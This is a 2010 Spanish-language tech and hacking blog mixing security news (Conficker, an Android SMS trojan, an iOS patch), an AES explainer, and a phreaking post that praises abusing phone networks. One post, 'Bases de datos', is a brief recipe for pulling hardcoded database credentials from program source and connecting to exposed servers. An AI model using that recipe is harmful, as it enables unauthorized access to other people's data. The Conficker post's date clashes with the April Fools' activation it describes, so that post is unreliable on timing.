y
Recibe las actualizaciones directo a tu correo

lunes, 6 de diciembre de 2010

Vulneravilidad

"Errare humanum est" (" Errar es humano.")
Marcus Tullius Cicero, filósofo, estadista y escritor romano





"Errar es humano, pero hacer las cosas realmente mal, es necesario usar un ordenador"
Paul Ehrlich



El término ‘vulnerabilidad’ es se menciona a menudo en conexión con la seguridad de los ordenadores en muchos diferentes contextos.



En su sentido más amplio, el término ‘vulnerabilidad’ se refiere a la violación de una política de seguridad . Esto puede deberse a reglas de seguridad inadecuadas o a problemas dentro del mismo software. En teoría , todos los sistemas de ordenadores tienen vulnerabilidades, de cuya seriedad depende que sean o no usados para causar un daño al sistema.



Han habido muchos intentos de definir claramente el término ‘vulnerabilidad’ y separar los dos significados. MITRE, un grupo de investigación y desarrollo fundado en Estados Unidos, que se concentra en el análisis y la solución de situaciones críticas de seguridad. El grupo propone las siguientes definiciones:



Según la Terminología de MITRE's CVE :



[...] Una vulnerabilidad universal es un estado en un sistema de ordenadores o un grupo de sistemas que:

permite que un atacante ejecute órdenes como otro usuario
permite que un atacante tenga acceso a los datos de acceso restringido
permite que un atacante hacerse pasar por otra entidad
permite que un atacante conduzca un denegación de servicio.


MITRE cree que cuando un ataque se hace posible por una debilidad o una política de seguridad inapropiada, es mejor descrita como "exposición"



Una exposición es un estado en un sistema de ordenadores ( o grupo de sistemas) que no es una vulnerabilidad universal, pero:

permite que un atacante reúna información sobre las actividades del sistema
permite que un atacante disimule sus actividades
Incluye una función que se comporta como se espera, pero puede ser fácilmente puesta en peligro
Es un punto primario de entrada que un atacante puede intentar usar para obtener acceso al sistema o a los datos.
Es considerado un problema de acuerdo a alguna política de seguridad razonable.


Cuando se trata de obtener acceso no autorizado al sistema, un intruso usualmente primero realiza un escaneo de rutina (o investigación) del blanco, reúne cualquier dato ‘expuesto’ y luego explota las debilidades o vulnerabilidades de las políticas de seguridad.

Por esta razón, las vulnerabilidades y exposiciones son aspectos importantes que deben ser considerados cuando se asegura un sistema contra el acceso no autorizado.

miércoles, 10 de noviembre de 2010

Si estás borracho, no podrás escribir en las redes sociales

Un grupo de seguridad informática en Internet creó una nueva herramienta destinada a impedir a los adeptos de las redes sociales escribir, cuando estén ebrios, en sitios como Facebook, Myspace o Twitter, lo que podrían lamentar al día siguiente.

Partiendo del principio que "nada bueno ocurre después de la una de la madrugada", el programa de la empresa Webroot, con sede en el estado de Colorado (oeste de Estados Unidos) promete "poner fin a la pesadilla que sigue al envío de mensajes tardíos de los que uno se arrepiente".

La herramienta, llamada "Test de sobriedad para redes sociales" es gratuita para los usuarios del navegador Firefox. Requiere que los internautas se sometan a un examen de coordinación antes de acceder a sus sitios de socialización predilectos.

La prueba implica entre otros que la persona logre mantener el cursor del ratón en el centro de un círculo en constante movimiento o que identifique correctamente una serie de luces intermitentes. Si el usuario fracasa, no puede acceder a dichos sitios.

El gigante estadounidense en internet Google propone una herramienta similar a los usuarios de Gmail, "Mail Goggles", que los obliga a resolver cinco problemas matemáticos simples en menos de un minuto para poder enviar un correo.

FUENTE :http://www.laflecha.net/canales/blackhats/noticias/si-estas-borracho-no-podras-escribir-en-las-redes-sociales

domingo, 26 de septiembre de 2010

Alerta mundial posible activacion del peligroso virus informatico


Según IBM Internet Security Systems, un 45% de los PCs ya está infectado en Asia, un 31 en Europa, un 14 en Latinoamérica y un 6 en Norteamérica.
SAN FRANCISCO.- La última versión de Conficker, el virus informático que trae de cabeza a los expertos en seguridad en Internet, podría activarse hoy, lo que ha puesto en alerta a empresas, gobiernos y usuarios de todo el mundo.

Los expertos del sector han advertido que esta nueva y dañina versión de Conficker, también conocida como “Conficker.C”, "Downadup” o “Kido”, ya ha infectado a millones de computadores y empezará a recibir nuevas órdenes mañana.

El propio FBI ha emitido una alerta en la que pide a los internautas que extremen la vigilancia y, sobre todo, no abran emails sospechosos o procedentes de fuentes desconocidas.

Según la firma de seguridad IBM Internet Security Systems, un 45 por ciento de los PCs ya infectados está en Asia, un 31 por ciento en Europa, un 14 por ciento en Latinoamérica y sólo un 6 por ciento en Norteamérica.

La nueva modalidad del virus, consideran los analistas, provocará que las computadoras infectadas se conecten con los servidores de los hackers, pero no está muy claro cuáles serán las consecuencias.

El gusano tiene la capacidad de crear lo que se conoce como red de “zombies”, computadoras conectadas a servidores remotos sin el conocimiento de sus dueños y en las que los hacker pueden operar a su antojo.

La llegada de la última generación de Conficker coincidirá en los países anglosajones con el Día de los Inocentes, lo que posiblemente añadirá algo de confusión para muchos usuarios.

En sus anteriores versiones, el virus ha afectado a unos 15 millones de ordenadores de todo el mundo sin que las autoridades hayan logrado dar con los responsables, a pesar de la recompensa de 250 mil dólares ofrecida por Microsoft.

El gigante del software lanzó el pasado octubre el parche MS08-067 que repara la vulnerabilidad de Windows.

De cara a la jornada de hoy, los expertos recomiendan tener instalado este parche, contar con antivirus y Windows actualizado, instalar cortafuegos, reforzar las contraseñas y desactivar la reproducción automática de los dispositivos extraíbles (USB, discos duros o MP3).

sábado, 18 de septiembre de 2010

Bases de datos

Bueno gente el concepto es mas fácil de lo que parece, antes que nada tenemos que tener un concepto medio medio-alto de sql y programación en general si no bueno espero que consigan algún manual y después se fijen en este post.

1) Buscando objetivos: La joda es la siguiente, todo programa al conectarse a una base de datos sql o access lo hace mediante lo que se denomina STRING DE CONEXIÓN, esto es básicamente una cadena de caracteres en la cual aparecen con detalle el usuario , contraseña y host de la base de datos. Tenemos que buscar estos objetivos utilizando los métodos conocidos.

2) Leyendo el código: Cuando nos encontremos con el fuente del programa tendremos que buscar la siguiente declaración (por ejemplo en un VB6.0)

Set mdb = New ADODB.Connection
mdb.Open "DRIVER={PostgreSQL+};SERVER=XXX;port=XXX;DATABASE=XXX;UID=postgres;PWD=postgres;", "postgres", "postgres"

3) Si hemos encontrado ese código bueno significa que vamos bien, lo siguiente es entender que tipo de host tiene esta base por ejemplo localhost es solo para conexiones desde el host tmb para ip del estilo 192.XXX.XXX.XXX , lo que nos interesa es el bug siguiente una ip del estilo 200.XXX.XXX.XXX o algun texto indicativo de que se puede conectar desde cualquier pc a esta base de datos mediante esa contraseña y nombre de usuario.

4) Por ultimo nos bajamos cualquier programita para conectarnos a una base de datos y listo a disfrutar

sábado, 21 de agosto de 2010

Algoritmos

Hoy os hablare de uno de los algoritmos que comprenden internet

Advanced Encryption Standard (AES), también conocido como Rijndael (pronunciado "Rain Doll" en inglés), es un esquema de cifrado por bloques adoptado como un estándar de cifrado por el gobierno de los Estados Unidos. El AES fue anunciado por el Instituto Nacional de Estándares y Tecnología (NIST) como FIPS PUB 197 de los Estados Unidos (FIPS 197) el 26 de noviembre de 2001 después de un proceso de estandarización que duró 5 años (véase proceso de Advanced Encryption Standard para más detalles). Se transformó en un estándar efectivo el 26 de mayo de 2002. Desde 2006, el AES es uno de los algoritmos más populares usados en criptografía simétrica.
El cifrador fue desarrollado por dos criptólogos belgas, Joan Daemen y Vincent Rijmen, ambos estudiantes de la Katholieke Universiteit Leuven, y enviado al proceso de selección AES bajo el nombre "Rijndael".


Historia

En 1997, el Instituto Nacional de Normas y Tecnología (NIST) decidió realizar un concurso para escoger un nuevo algoritmo de cifrado capaz de proteger información sensible durante siglo XXI. Este algoritmo se denominó Advanced Encryption Standard (AES).
El 2 de enero de 1997 el NIST anunció su intención de desarrollar AES, con la ayuda de la industria y de la comunidad criptográfica. El 12 de septiembre de ese año se hizo la convocatoria formal. En esta convocatoria se indicaban varias condiciones para los algoritmos que se presentaran:
Ser de dominio público, disponible para todo el mundo.
Ser un algoritmo de cifrado simétrico y soportar bloques de, como mínimo, 128 bits.
Las claves de cifrado podrían ser de 128, 192 y 256 bits.
Ser implementable tanto en hardware como en software.
El 20 de agosto de 1998 el NIST anunció los 15 algoritmos admitidos en la primera conferencia AES:
CAST-256 (Entrust Technologies, Inc.)
CRYPTON (Future Systems, Inc.)
DEAL (Richard Outerbridge, Lars Knudsen)
DFC (CNRS – Centre National pour la Recherche Scientifique – Ecole Normale Superieure)
E2 (NTT – Nippon Telegraph and Telephone Corporation)
FROG (TecApro International, S.A.)
HPC (Rich Schroeppel)
LOKI97 (Lawrie Brown, Josef Pieprzyk, Jennifer Seberry)
MAGENTA (Deutsche Telekom AG)
MARS (IBM)
RC6 (RSA Laboratories)
RIJNDAEL (John Daemen, Vincent Rijmen)
SAFER+ (Cylink Corporation)
SERPENT (Ross Anderson, Eli Biham, Lars Knudsen)
TWOFISH (Bruce Schneier, John Kelsey, Doug Whiting, David Wagner, Chris Hall, Niels Ferguson)
La segunda conferencia AES tuvo lugar en marzo de 1999 donde se discutieron los análisis a los que fueron sometidos los candidatos por la comunidad criptográfica internacional. Se admitieron comentarios hasta el 15 de abril. El NIST decidió en agosto de 1999 cuales serían los 5 finalistas:
MARS
RC6
RIJNDAEL
SERPENT
TWOFISH
Estos algoritmos fueron sometidos a una segunda revisión, más exhaustiva, que duró hasta el 15 de mayo de 2000. Durante este periodo el NIST admitió análisis de los algoritmos finalistas.
Durante los días 13 y 14 de abril de 2000 tuvo lugar la tercera conferencia AES donde se discutieron los últimos análisis de los algoritmos finalistas. En ella estuvieron presentes los desarrolladores de los algoritmos finalistas.
El 15 de mayo de 2000 finalizó el periodo público de análisis. El NIST estudió toda la información disponible para decidir cual sería el algoritmo ganador. El 2 de octubre de 2000 se votó cual sería el algoritmo que finalmente ganaría el concurso. El resultado fue el siguiente:
MARS: 13 votos
RC6: 23 votos
RIJNDAEL: 86 votos
SERPENT: 59 votos
TWOFISH: 31 votos
El algoritmo Rijndael ganó el concurso y en noviembre de 2001 se publicó FIPS 197 donde se asumía oficialmente.
[editar]Desarrollo

Rijndael fue un refinamiento de un diseño anterior de Daemen y Rijmen, Square; Square fue a su vez un desarrollo de Shark.
Al contrario que su predecesor DES, Rijndael es una red de sustitución-permutación, no una red de Feistel. AES es rápido tanto en software como en hardware, es relativamente fácil de implementar, y requiere poca memoria. Como nuevo estándar de cifrado, se está utilizando actualmente a gran escala.


Descripción del cifrado



En la fase de SubBytes, cada byte en el state es reemplazado con su entrada en una tabla de búsqueda fija de 8 bits, S; bij = S(aij).


En el paso ShiftRows, los bytes en cada fila del state son rotados de manera cíclica hacia la izquierda. El número de lugares que cada byte es rotado difiere para cada fila.


En el paso MixColumns, cada columna del state es multiplicada por un polinomio constante c(x).


En el paso AddRoundKey, cada byte del state se combina con un byte de la subclave usando la operación XOR (⊕).
Estrictamente hablando, AES no es precisamente Rijndael (aunque en la práctica se los llama de manera indistinta) ya que Rijndael permite un mayor rango de tamaño de bloques y longitud de claves; AES tiene un tamaño de bloque fijo de 128 bits y tamaños de llave de 128, 192 ó 256 bits, mientras que Rijndael puede ser especificado por una clave que sea múltiplo de 32 bits, con un mínimo de 128 bits y un máximo de 256 bits.
La mayoría de los cálculos del algoritmo AES se hacen en un campo finito determinado.
AES opera en una matriz de 4×4 bytes, llamada state (algunas versiones de Rijndael con un tamaño de bloque mayor tienen columnas adicionales en el state).



Pseudo-código
Expansión de la clave usando el esquema de claves de Rijndael.
Etapa inicial:
AddRoundKey
Rondas:
SubBytes — en este paso se realiza una sustitución no lineal donde cada byte es reemplazado con otro de acuerdo a una tabla de búsqueda.
ShiftRows — en este paso se realiza una transposición donde cada fila del «state» es rotada de manera cíclica un número determinado de veces.
MixColumns — operación de mezclado que opera en las columnas del «state», combinando los cuatro bytes en cada columna usando una transformación lineal.
AddRoundKey — cada byte del «state» es combinado con la clave «round»; cada clave «round» se deriva de la clave de cifrado usando una iteración de la clave.
Etapa final:
SubBytes
ShiftRows
AddRoundKey



En el paso ShiftRows, los bytes en cada fila del state son rotados de manera cíclica hacia la izquierda. El número de lugares que cada byte es rotado difiere para cada fila.



En el paso MixColumns, cada columna del state es multiplicada por un polinomio constante c(x).

Etapa SubBytes- Substitución de bits
En la etapa SubBytes, cada byte en la matriz es actualizado usando la caja-S de Rijndael de 8 bits. Esta operación provee la no linealidad en el cifrado. La caja-S utilizada proviene de la función inversa alrededor del GF(28), conocido por tener grandes propiedades de no linealidad. Para evitar ataques basados en simples propiedades algebraicas, la caja-S se construye por la combinación de la función inversa con una transformación afín inversible. La caja-S también se elige para evitar puntos estables (y es por lo tanto un derangement), y también cualesquiera puntos estables opuestos.
La caja-S es descrita en mayor profundidad en el artículo caja-S de Rijndael.
[editar]Etapa ShiftRows-Desplazar filas
El paso ShiftRows opera en las filas del state; rota de manera cíclica los bytes en cada fila por un determinado offset. En AES, la primera fila queda en la misma posición. Cada byte de la segunda fila es rotado una posición a la izquierda. De manera similar, la tercera y cuarta filas son rotadas por los offsets de dos y tres respectivamente. De esta manera, cada columna del state resultante del paso ShiftRows está compuesta por bytes de cada columna del state inicial. (variantes de Rijndael con mayor tamaño de bloque tienen offsets distintos)



En el paso AddRoundKey, cada byte del state se combina con un byte de la subclave usando la operación XOR (⊕).

Etapa MixColumns- Mezclar columnas
En el paso MixColumns, los cuatro bytes de cada columna del state se combinan usando una transformación lineal inversible. La función MixColumns toma cuatro bytes como entrada y devuelve cuatro bytes, donde cada byte de entrada influye todas las salidas de cuatro bytes. Junto con ShiftRows, MixColumns implica difusión en el cifrado. Cada columna se trata como un polinomio GF(28) y luego se multiplica el módulo x4 + 1 con un polinomio fijo c(x). El paso MixColumns puede verse como una multiplicación matricial en el campo finito de Rijndael.
[editar]Etapa AddRoundKey- Cálculo de las subclaves
En el paso AddRoundKey, la subclave se combina con el state. En cada ronda se obtiene una subclave de la clave principal, usando la iteración de la clave; cada subclave es del mismo tamaño del state. La subclave se agrega combinando cada byte del state con el correspondiente byte de la subclave usando XOR.
[editar]Optimización del cifrado
En sistemas de 32 bits o de mayor tamaño de palabra, es posible acelerar la ejecución de este algoritmo mediante la conversión de las transformaciones SubBytes, ShiftRows y MixColumn en tablas. Se tienen cuatro tablas de 256 entradas de 32 bits que utilizan un total de 4 kilobytes (4096 bytes) de memoria, un Kb cada tabla. De esta manera, una ronda del algoritmo consiste en 16 búsquedas en una tabla seguida de 16 operaciones XOR de 32 bits en el paso AddRoundKey. Si el tamaño de 4 kilobytes de la tabla es demasiado grande para una plataforma determinada, la operación de búsqueda en la tabla se puede realizar mediante una sola tabla de 256 entradas de 32 bits mediante el uso de rotaciones circulares.
[editar]Seguridad

Hasta 2005, no se ha encontrado ningún ataque exitoso contra el AES. La Agencia de Seguridad Nacional de los Estados Unidos (NSA) revisó todos los finalistas candidatos al AES, incluyendo el Rijndael, y declaró que todos ellos eran suficientemente seguros para su empleo en información no clasificada del gobierno de los Estados Unidos. En junio de 2003, el gobierno de los Estados Unidos anunció que el AES podía ser usado para información clasificada:
"The design and strength of all key lengths of the AES algorithm (i.e., 128, 192 and 256) are sufficient to protect classified information up to the SECRET level. TOP SECRET information will require use of either the 192 or 256 key lengths. The implementation of AES in products intended to protect national security systems and/or information must be reviewed and certified by NSA prior to their acquisition and use.1 "
Este hecho marca la primera vez que el público ha tenido acceso a un cifrador aprobado por la NSA para información super secreta (TOP SECRET). Es interesante notar que muchos productos públicos usan llaves de 128 bits por defecto; es posible que la NSA sospeche de una debilidad fundamental en llaves de este tamaño, [cita requerida] o simplemente prefieren tener un margen de seguridad para documentos super secretos (que deberían conservar la seguridad durante décadas en el futuro).
El método más común de ataque hacia un cifrador por bloques consiste en intentar varios ataques sobre versiones del cifrador con un número menor de rondas. El AES tiene 10 rondas para llaves de 128 bits, 12 rondas para llaves de 192 bits, y 14 rondas para llaves de 256 bits. Hasta 2005, los mejores ataques conocidos son sobre versiones reducidas a 7 rondas para llaves de 128 bits, 8 rondas para llaves de 192 bits, y 9 rondas para llaves de 256 bits (Ferguson et al, 2000).
Algunos criptógrafos muestran preocupación sobre la seguridad del AES. Ellos sienten que el margen entre el número de rondas especificado en el cifrador y los mejores ataques conocidos es muy pequeño. El riesgo es que se puede encontrar alguna manera de mejorar los ataques y de ser así, el cifrado podría ser roto. En el contexto criptográfico se considera "roto" un algoritmo si existe algún ataque más rápido que una búsqueda exhaustiva (ataque por fuerza bruta). De modo que un ataque contra el AES de llave de 128 bits que requiera 'sólo' 2120 operaciones sería considerado como un ataque que "rompe" el AES aun tomando en cuenta que por ahora sería un ataque irrealizable. Hasta el momento, tales preocupaciones pueden ser ignoradas. El ataque de fuerza bruta más largamente publicitado y conocido ha sido contra una clave de 64 bits RC5 por distributed.net.
Otra preocupación es la estructura matemática de AES. A diferencia de la mayoría de cifradores de bloques, AES tiene una descripción matemática muy ordenada.2 3 Esto no ha llevado todavía a ningún ataque, pero algunos investigadores están preocupados que futuros ataques quizá encuentren una manera de explotar esta estructura.
En 2002, un ataque teórico, denominado "ataque XSL", fue anunciado por Nicolas Courtois y Josef Pieprzyk, mostrando una potencial debilidad en el algoritmo AES. Varios expertos criptográficos han encontrado problemas en las matemáticas que hay por debajo del ataque propuesto, sugiriendo que los autores quizá hayan cometido un error en sus estimaciones. Si esta línea de ataque puede ser tomada contra AES, es una cuestión todavía abierta. Hasta el momento, el ataque XSL contra AES parece especulativo; es improbable que nadie pudiera llevar a cabo en la práctica este ataque.
[editar]Ataques de canal auxiliar
Los ataques de canal auxiliar no atacan al cifrador en sí, sino a las implementaciones del cifrador en sistemas que revelan datos inadvertidamente.
En abril de 2005, Daniel J. Bernstein anunció un ataque temporizado de cache4 que solía romper un servidor a medida que usaba el cifrado AES para OpenSSL. Este servidor fue diseñado para dar la mayor cantidad de información acerca de los tiempos de ejecución como fuera posible, y el ataque requería cerca de 200 millones de ficheros de texto en claro. Se dice que el ataque no es práctico en implementaciones del mundo real;5 Bruce Schneier llamó a esta investigación un "bonito ataque de tiempos".6
En octubre de 2005, Adi Shamir y otros dos investigadores presentaron un artículo demostrando varios ataques de tiempos de cache7 contra AES. Uno de los ataques obtuvo una clave de AES entera después de tan sólo 800 escrituras, en 65 milisegundos. Este ataque requiere que el atacante pueda ejecutar programas en el mismo sistema que realiza el cifrado de AES.

Y esto seria todo espero que os guste

Y si es posible dadme temas para publicar en mi blog

domingo, 15 de agosto de 2010

Phreaking






Los phreakers, esos apasionados del sistema telefónico, investigadores de las telecomunicaciones. Su hobby es conocer el funcionamiento de las redes de telefonía, para después hacer con ellas lo que quieran (llamar gratis, hacer que el vecino pague más..., dejar a media ciudad sin teléfono, metiendo, por lo tanto, en un gran aprieto a la compañia suministradora de servicios telefónicos). Muchas veces, el phreaker hace esto porque defiende que las telecomunicaciones son un servicio como la sanidad o la educación, y deberían ser algo gratuito, no un chollo para unos pocos, porque "las telecominicaciones son de interés general y la gente debería recibir periódicamente mucha más información sobre ellas".

Fuera de esto, los phreaker se dedican a adquirir conocimientos para llevarlos a la práctica bajo su responsabilidad, descubriendo nuevas dimensiones, hasta entonces ocultas para la mayoría de la gente.

Si quieres descubrir esta maravilloso mundo, estás en el lugar idoneo

jueves, 12 de agosto de 2010

Primer troyano telefonico


La firma Kapersky descubre que los teléfonos con sistema Android acaban de recibir el ataque de su primer troyano.
12/08/2010 - Los usuarios de smartphones con sistema operativo móvil de Google tienen una nueva fuente de preocupación ya que ha sido descubierto que son vulnerables frente al ataque de un troyano llamado Trojan-SMS.AndroidOS.FakePlayer.a.

El ataque se produce cuando al dispositivo se le envía un mensaje donde se solicita que se instale un pequeño archivo que pasa por un inofensivo reproductor multimedia y que con un peso de unos 13 KB tiene la extensión estándar de Android, .APK. Una vez instalada la aplicación bajo la que se esconde el troyano, este envía mensajes de texto a números premium sin conocimiento por el usuario.

Según la firma de seguridad que ha descubierto el troyano, ahora mismo no hay un número exacto de los dispositivos infectados. Por ahora, sólo los usuarios rusos de Android realmente pueden perder dinero tras instalar el troyano.

Android parece convertirse en un objetivo interesante para hackers y creadores de malware, no solo por ser el sistema operativo móvil con mayor crecimiento en ventas entre los fabricantes de smartphones sino por ser el sistema operativo móvil del todopoderoso Google.

A pesar de que se trata del primer virus troyano en Android, los terminales con este sistema operativo ya habían sido infectados por spyware anteriormente.

Entre los dispositivos afectados hay smartphones de HTC, Lenovo, LG, Philips, Samsung, Sony.........

Polémica entre Sky y Skype

La primera es un grupo británico de televisión de pago (BSkyB) y, la segunda, es un software para realizar llamadas sobre Internet (VoIP), que ha sido demandada porque la marca se parece demasiado a la primera. Un portavoz de la plataforma de televisión por satélite dijo que hay una disputa sobre las solicitudes de registro de marca, pero que todavía no se ha iniciado ningún proceso judicial contra Skype.



"El principal argumento de la disputa se encuentra en que las compañías 'Sky' y 'Skype' parecerán confusamente similares para el público", ha afirmado el portavoz de Sky. "Esto se ha visto respaldado por un estudio de mercado llevado a cabo por Sky", añadió.
Skype presentó una solicitud para realizar una oferta pública inicial de hasta 75 millones de euros, esperando que el amplio reconocimiento de su nombre y su rápido crecimiento ayuden a atraer a los inversores. La compañía también señaló que el registro de su marca comercial había recibido la oposición de terceras partes, entre ellas, la de BSkyB, informan en PortalTIC. "Estas oposiciones proceden de los derechos que ha reclamado BSkyB con respecto a la marca 'Sky'", indicaba el texto de la oferta.

Apple parchea las vulnerabilidades que permiten el último Jailbreak del iPhone
Apple ha lanzado una actualización para parchear vulnerabilidades de su iOS descubiertas a primeros de este mes por los investigadores que han creado el último Jailbreak del iPhone.


Apple ha lanzado actualizaciones tanto para el iOS 4 utilizado por el iPhone e iPod Touch, como para el iOS 3 utilizado por el iPad. Ambas actualizaciones se están distribuyendo a través de iTunes y se pueden instalar conectando los dispositivos a un ordenador y ejecutando la aplicación.
Las actualizaciones bloquean un par de fallos de ejecución remota de código en el visor de PDF del iOS y componentes IOSuface que se pueden explotar a través de páginas especialmente modificadas.
Las vulnerabilidades las han descubierto inicialmente un grupo de investigadores del proyecto iPhoneDevTeam, que las ha utilizado para ofrecer a los usuarios una manera de modificar el iPhone de forma remota para permitir el uso de aplicaciones no permitidas por Apple.
Aunque las vulnerabilidades no se han explotado de forma activa, se corre el riesgo de que un desarrollador de malware haga uso de ellas para la instalación de malware.
Es decir que los parches impedirían tanto que los atacantes explotaran las vulnerabilidades con malware como que la técnica de jailbreak que se aprovecha de ellas siguiera funcionando en los dispositivos actualizados.
Como es lógico el iPhoneDevTeam está advirtiendo a los usuarios de terminales con el jailbreak que no instalen las actualizaciones hasta que desarrollen una solución.
Tags:Actualizaciones, Apple iOS, iOS 4, iPhoneDevTeam, Jailbreak, Vulnerabilidades

domingo, 8 de agosto de 2010


BRUSELAS/HELSINKI (Reuters) - La Comisión Europea ha rechazado la BlackBerry de Research in Motion (RIM) en favor de los teléfonos avanzados iPhone de Apple y HTC, dijo un portavoz, en plena polémica sobre la seguridad de las BlackBerry.
El brazo ejecutivo de la UE, que emplea a más de 32.000 personas, revisó su opción de teléfono comparando varios criterios, incluida la seguridad y el impacto económico, cuando desplegó una nueva plataforma tecnológica en 2008.

Varios gobiernos han amenazado recientemente con recortar el uso de la BlackBerry por razones de seguridad, y Arabia Saudí se unió el martes a los Emiratos Arabes Unidos, India y Kuwait.

Los gobiernos están preocupados porque no pueden supervisar el tráfico de la BlackBerry, ya que al contrario que rivales como Nokia y Apple, RIM controla sus propias redes, que manejan mensajes encriptados a través de un centro de servidores en Canadá y Reino Unido.

"Después de esta evaluación, los HTC y los iPhones emergieron como las plataformas más aptas como dispositivos móviles de voz y de mail. Como resultado, la Comisión actualmente apoya a esas dos plataformas", escribió el portavoz en un correo electrónico.

Previamente, la Comisión usaba PDAs fabricadas por Qtek, ahora propiedad de la taiwanesa HTC. El portavoz señaló que unos 2.500 afectados estaban afectados, y que todos los criterios habían pesado por igual.

El jefe de Tecnología de RIM, David Yach, dijo a Reuters el martes que creía que los gobiernos probablemente no seguirían con sus amenazas porque las autoridades estatales dependían enormemente de las BlackBerries.

Pero los que una vez fueran dispositivos icónicos ya no son las herramientas de negocios indispensables que parecían, y muchas empresas se han abierto a permitir alternativas como el iPhone ya que los empleados demandan los mismos resultados de sus herramientas de trabajo y sus dispositivos para el ocio.

El banco británico Standard Chartered dijo a principios de año que daba a sus empleados la opción de cambiar las BlackBerry por el iPhone, una iniciativa que tarde o temprano podría resultar en que miles de empleados bancarios cambiaran.

lunes, 2 de agosto de 2010

Iphone 4

Tras una conferencia al más puro estilo Apple se han desvelado las curiosidades del modelo más esperado. Recordemos que en su historia quedará para siempre la aparición del supuesto prototipo que recogió la web Gizmodo y que ha terminado en los tribunales. El bueno de Steve ha hecho un repaso por las bondades y las ventas de libros y aplicaciones del iPad, ha dado paso a la gente que nos contó varios temas relacionados con los juegos en el iPhone. El iPhone 4 es el más fino de toda la gama, solamente 9,3mm de grosor que lo hacen hasta un 24% más pequeño que los modelos anteriores. Steve Jobs va más lejos al afirmar que es el teléfono más delgado de la historia, y con un diseño rompedor de acero inoxidable (que a su vez desempeña la función de antena) y de cristal antiarañazos.



Pantalla de Retina
El CEO de Apple fue el encargado de presentar la nueva tecnología de la pantalla. Se denomina “Retina Display”, o Pantalla Retina, que esencialmente multiplica la cantidad de píxeles en un área determinada. Según los análisis y estudios que Steve Jobs ha comentado, el ojo humano puede percibir una calidad casi perfecta en torno a 300 píxeles por pulgada; de ahí que el nuevo iPhone 4 monte un panel de 326 píxeles por pulgada para dotarlo de la mejor calidad vista hasta ahora. Ofrece una resolución de 960 x 640 píxeles y un contraste de 800:1. La tecnología IPS (ligeramente mejor que la tecnología OLED) ofrece un color impecable y un ángulo de visión muy amplio. La firma además ha comentado que tanto el frontal como la parte trasera ha sido fabricada en un cristal denominado “aluminosilcate” que es hasta un 30 por ciento más resistente que el plástico. Además ambas superficies disponen de una capa capa oleo-resistente que evita la suciedad. Por su parte el cerco de aluminio externo es cinco veces más resistente que el acero convencional.



Núcleo Apple A4, Autonomía y Conectividad
El iPhone 4 incorpora como motor el chip A4 de ARM de 1 GHz de velocidad. El bajo consumo de este chip permitirá alcanzar hasta 300 horas en reposo, 7 horas en conversación 3G, 10 horas de navegación WiFi y hasta 40 horas de reproducción de música. Al igual que los modelos anteriores, el iPhone trae el conector Dock para poder conectar y sincronizar el terminal a nuestro PC. Requiere utilizar tarjeta microSIM (que ya entregan la mayoría de los operadores para los iPad). En el apartado inalámbrico, nos encontramos con WiFi 802.11n (que alcanza teóricamente hasta 108Mbps), y conectividad 3G HSDPA / HSUPA que permite hasta 7,2 Mbps de bajada y 5,8 de subida en este teléfono cuatribanda. No falta la conexión Bluetooth para hacer conexiones entre dispositivos a corta distancia ni el GPS integrado.





Almacenamiento, Vídeo y Audio. Características audiovisuales
Con el nuevo teléfono, podemos grabar vídeos en Alta Definición con calidad 720p a 30 frames por segundo. Gracias al lanzamiento de iMovie para iPhone, podremos editar los videos sobre la marcha y enviarlos a nuestros amigos vía email o subirlos a redes sociales. Un programa que tendrá un coste de 4,99 dólares.

5 Megapíxeles
La cámara de 5 megapíxeles cuenta, al fin, con un pequeño flash LED y zoom digital de 5 aumentos. Será posible enfocar con el dedo sobre el objeto o persona que deseemos que sea el centro de atención en la foto. Una calidad, la de los cinco megapíxeles, que mejora con respecto al 3GS pero no llega a los 12 megapíxeles que es lo que ofrecen los móviles más potentes del momento. Sin saber aún detalles de modelos, Steve Jobs ha aclarado que el modelo de mayor tamaño, de momento, será de 32GB.



Los precios
Los precios era uno de los temas más esperados y aquí están. 199 (166 euros) dólares la unidad de 16 GB y 299 dólares (250 euros) el de 32GB en EEUU con contrato. El iPhone 4 saldrá a la venta el 24 de Junio y la semana que viene ya se pueden hacer reservas a partir del día 15 en USA, Japón, Francia, Alemania, UK… pero parece que en España habrá que esperar a Julio. Los precios son con dos años de permanencia y tarifas de datos. Esperemos que al realizar el cambio de moneda los operadores españoles lo hagan como debe ser y al final del nuevo iPhone cueste solo 250 euros.

Apple iOS4 actualización
El sistema operativo del nuevo iPhone 4 será Apple iOS4. Un sistema multitarea, que aporta la posibilidad de crear carpetas para las diferentes aplicaciones. En él podremos disfrutar de iBooks, la nueva aplicación para disfrutar de los libros electrónicos en el iPhone. El 21 de junio estará disponible para todos los iPhone del planeta de manera gratuita. Eso sí no podemos dejar de criticar que la función de videollamada, agrupada bajo la aplicación FaceTime, muy esperada por las fans de Apple, solo sea posible a través de WiFi. A cambio también hay que destacar que el equipo no lleva un sencillo acelerómetro, sino que se une a un giroscopio, lo que le permitirá ser más preciso en aplicaciones como pueden ser los juegos. Un giróscopo de triple eje que, combinado con el acelerómetro, ofrece detección de movimiento en seis ejes, como por ejemplo arriba y abajo, lado a lado, adelante y atrás, y lanzar y recoger.

GENERAL Red 2G (GSM) 850 | 900 | 1800 | 1900
Red 3G UMTS
HSDPA (7,6 Mbps de velocidad de descarga)
HSUPA (5,76 Mbps de velocidad de subida)
Lanzamiento 07/06/2010
Dimensiones 115,2 x 58,6 x 9,3
Peso 137 gr
Formato Barra
PANTALLA Tecnología TFT Táctil
Tamaño 3,5 (tecnología IPS) pulgadas
Colores 16 millones
Resolución 960 × 640
Widgets Sí
CÁMARA Resolución 5 MP (2592 x 1936 píxeles) / 5x digital
Óptica
Flash / Tapa / Espejo Sí / No / No
Resolución Vídeo HD 720p (1280 X 720 píxeles) a 30 frames por segundo. Alta Definición
Formatos Vídeo MPEG 4
Formatos Reproducción MPEG 4
Opciones modo foto
Opciones modo vídeo
Salida TV Sí
MÚSICA Salida auriculares mini Jack 3,5 mm
Radio / Podcast (de serie) No / Sí
Formatos AAC / Protected AAC / HE-AAC / MP3 / MP3 VBR / AAX / AAX / Apple Lossless / AIFF / WAV
A2DP Sí
Extras
NAVEGACIÓN Navegador Safari (Busquedas en Bing y Yahoo)
Acceso directo a redes sociales +
Servicios Google Google Search
Mensajería Instantánea +
Lector RSS No
GPS GPS Sí
Software GPS Google Maps
TIENDA Venta de música, tonos y vídeos App Store
Venta de aplicaciones App Store
CORREO Soporte IMAP / POP3 / SMTP Sí / Sí / Sí
Soporte Push Sí
Otros Microsoft Exchange
